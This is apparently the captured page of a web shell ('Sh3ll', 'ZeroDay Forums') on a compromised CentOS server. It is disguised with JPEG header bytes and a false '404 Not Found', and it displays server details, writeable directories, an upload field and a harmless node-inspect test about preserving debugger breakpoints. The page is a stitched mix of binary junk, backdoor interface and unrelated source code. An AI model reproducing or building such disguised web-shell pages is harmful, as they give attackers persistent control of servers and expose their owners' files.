ÿØÿàJFIFÿÛ„ ( %"1"%)+...383,7(-.- 404 Not Found
Sh3ll
OdayForums


Server : Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips PHP/7.4.20
System : Linux st2.domain.com 3.10.0-1127.10.1.el7.x86_64 #1 SMP Wed Jun 3 14:28:03 UTC 2020 x86_64
User : apache ( 48)
PHP Version : 7.4.20
Disable Function : NONE
Directory :  /proc/self/root/home/real/node-v13.0.1/deps/node-inspect/test/cli/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Current File : //proc/self/root/home/real/node-v13.0.1/deps/node-inspect/test/cli/preserve-breaks.test.js
'use strict';
const Path = require('path');

const { test } = require('tap');

const startCLI = require('./start-cli');

test('run after quit / restart', (t) => {
  const script = Path.join('examples', 'three-lines.js');
  const cli = startCLI([script]);

  function onFatal(error) {
    cli.quit();
    throw error;
  }

  return cli.waitForInitialBreak()
    .then(() => cli.waitForPrompt())
    .then(() => cli.command('breakpoints'))
    .then(() => {
      t.match(cli.output, 'No breakpoints yet');
    })
    .then(() => cli.command('sb(2)'))
    .then(() => cli.command('sb(3)'))
    .then(() => cli.command('breakpoints'))
    .then(() => {
      t.match(cli.output, `#0 ${script}:2`);
      t.match(cli.output, `#1 ${script}:3`);
    })
    .then(() => cli.stepCommand('c')) // hit line 2
    .then(() => cli.stepCommand('c')) // hit line 3
    .then(() => {
      t.match(cli.breakInfo, { filename: script, line: 3 });
    })
    .then(() => cli.command('restart'))
    .then(() => cli.waitForInitialBreak())
    .then(() => {
      t.match(cli.breakInfo, { filename: script, line: 1 });
    })
    .then(() => cli.stepCommand('c'))
    .then(() => {
      t.match(cli.breakInfo, { filename: script, line: 2 });
    })
    .then(() => cli.stepCommand('c'))
    .then(() => {
      t.match(cli.breakInfo, { filename: script, line: 3 });
    })
    .then(() => cli.command('breakpoints'))
    .then(() => {
      if (process.platform === 'aix') {
        // TODO: There is a known issue on AIX where the breakpoints aren't
        // properly resolved yet when we reach this point.
        // Eventually that should be figured out but for now we don't want
        // to fail builds because of it.
        t.match(cli.output, /#0 [^\n]+three-lines\.js\$?:2/);
        t.match(cli.output, /#1 [^\n]+three-lines\.js\$?:3/);
      } else {
        t.match(cli.output, `#0 ${script}:2`);
        t.match(cli.output, `#1 ${script}:3`);
      }
    })
    .then(() => cli.quit())
    .then(null, onFatal);
});

ZeroDay Forums Mini